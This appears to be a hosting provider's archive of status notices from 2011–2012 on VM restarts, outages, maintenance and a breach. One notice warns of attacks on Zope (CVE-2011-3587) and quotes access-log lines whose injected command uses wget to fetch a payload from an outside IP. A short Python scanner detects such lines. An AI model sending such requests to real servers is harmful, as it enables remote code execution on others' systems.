Saturday, 2012-03-03 22:00 CET: Restart of all VMs due to security update

We need to perform a security update on our VM hosts which requires a restart of all virtual machines.

The restart will begin on Saturday, 2012-03-03 at 22:00 CET and will take about 4 hours until all VMs have been rebooted. The reboot time of individual VMs may vary considerably, depending on whether a file system check is needed. We expect most VMs to reboot within 10-20 minutes.

For details about the security issue, see http://www.gentoo.org/security/en/glsa/glsa-201202-09.xml.

Please excuse the short notice. In line with our security policy, we strive to install relevant updates as quickly as possible to minimize the impact of known issues.

Connectivity issues 2012-01-29 (4:43pm-5:25pm CET)

From 4:43pm to 5:25pm CET we experienced high packet loss on our upstream connection to the data center.

The cause of this was a malware infestation on a customer VM. No infrastructure components appear to have been compromised.

Connectivity has been reliable again since we stopped the malware process.

The affected VM has been stopped and we are in contact with the customer to resolve the issue.

Maintenance for mail.gocept.net on 2012-01-04 22:00–23:00 CET

A maintenance window for mail.gocept.net services is scheduled for Wednesday 2012-01-04 between 22:00 and 23:00 CET. Please note that during this period, the mail server mail.gocept.net will be offline.

Customer VMs will not be affected directly but VMs using mail.gocept.net as relay might experience mail delivery delays. No mail will be lost.

This maintenance includes disk capacity upgrades.

Attacks against Zope installations

We have seen intensified attack activity against Zope installations since 2011-12-26. The activity focuses on automatically exploiting the vulnerability described in CVE-2011-3587, for which a patch is readily available.

Please ensure that all of your Zope installations contain the latest security patches, since gocept does not take responsibility for patching user applications.

Suspicious activity leaves traces in access log files that follow a pattern like:

211.191.168.XXX - - [26/Dec/2011:22:18:00 +0100] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/ieh1%20http://202.28.76.20/ieh1 HTTP/1.1" 200 154 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
211.191.168.XXX - - [26/Dec/2011:22:18:01 +0100] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=lwp-download%20http://202.28.76.20/ieh1 HTTP/1.1" 200 154 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
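To check your own access logs for similar requests, something along the following lines may help. This is only a minimal sketch: the function names and the regular expression are our own illustration, derived solely from the two sample lines above. Attackers may use other paths or user agents, so an empty result does not prove that an installation is unaffected.

```python
import re

# Assumption: both markers are taken from the sample log lines above.
# Other attack variants may not contain either of them.
SUSPICIOUS = re.compile(r"/os/popen2\?cmd=|Made by ZmEu", re.IGNORECASE)


def find_suspicious_lines(lines):
    """Return (line_number, line) pairs for log lines matching the pattern."""
    return [
        (number, line.rstrip("\n"))
        for number, line in enumerate(lines, start=1)
        if SUSPICIOUS.search(line)
    ]


def scan_log_file(path):
    """Scan one access log file; the path is supplied by the caller."""
    with open(path, encoding="utf-8", errors="replace") as handle:
        return find_suspicious_lines(handle)
```

Calling `scan_log_file` with the path to an access log returns the matching lines together with their line numbers. Any hit is worth a closer look, regardless of the HTTP status code logged for the request.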

Hardware failure of a VM server

On Monday, 2011-10-31, one of our VM servers failed completely. This caused an unplanned outage for several customer VMs and our mail server mail.gocept.net. We were able to limit the total downtime by migrating the affected VMs to other servers quickly.
It is unlikely that any data has been lost. Please excuse the service disruption.

The server started to decline network requests around 15:30 CET. Our stand-by support team was alerted immediately. After concluding that we could not revive the hardware quickly, we began moving VMs to other servers at 16:15 CET. Services were functional again around 16:45 CET.

Security breach on an internal system on 2011-10-18

On Tuesday (2011-10-18) at 22:45 CEST an attacker managed to gain access to one of our internal systems running, among others, the external service monitoring, the Redmine project management tool, and an internal mailing list server. The compromised system is not automatically managed.

Customer VMs were not affected.

We needed to take the machine partially off the network between Wednesday (2011-10-19) 13:20 and 21:00 CEST to perform an analysis and fix security holes. The above-mentioned services had only limited availability during this period. User-generated data has most likely not been compromised. We decided to take the machine back online to make the services available again as quickly as possible.

Nevertheless we will move the services to newly installed machines shortly and erase the compromised machine. We will review and improve our security practices to avoid similar incidents in the future.

Unplanned VM outage 2011-09-06 16:25-17:00 CEST

Unfortunately, some VMs experienced an unplanned outage yesterday (2011-09-05) between 16:25 and 17:00 CEST as their root disks turned read-only.

To recover from this state quickly, we forcibly shut down the VMs and rebooted the associated KVM server. The VMs recovered fine after this reboot.

Owners of affected VMs were notified individually directly after the incident.

It appears that we hit a bug in our iSCSI initialisation code that caused all VMs on this physical host to lose connectivity to their storage server.

The issue was triggered while we were bootstrapping a new virtual machine.

The bug is currently undergoing further analysis and replication in our development environment and will be fixed soon.

For the time being, we have ceased to perform actions that trigger this bug and do not expect your VM to be affected by it again.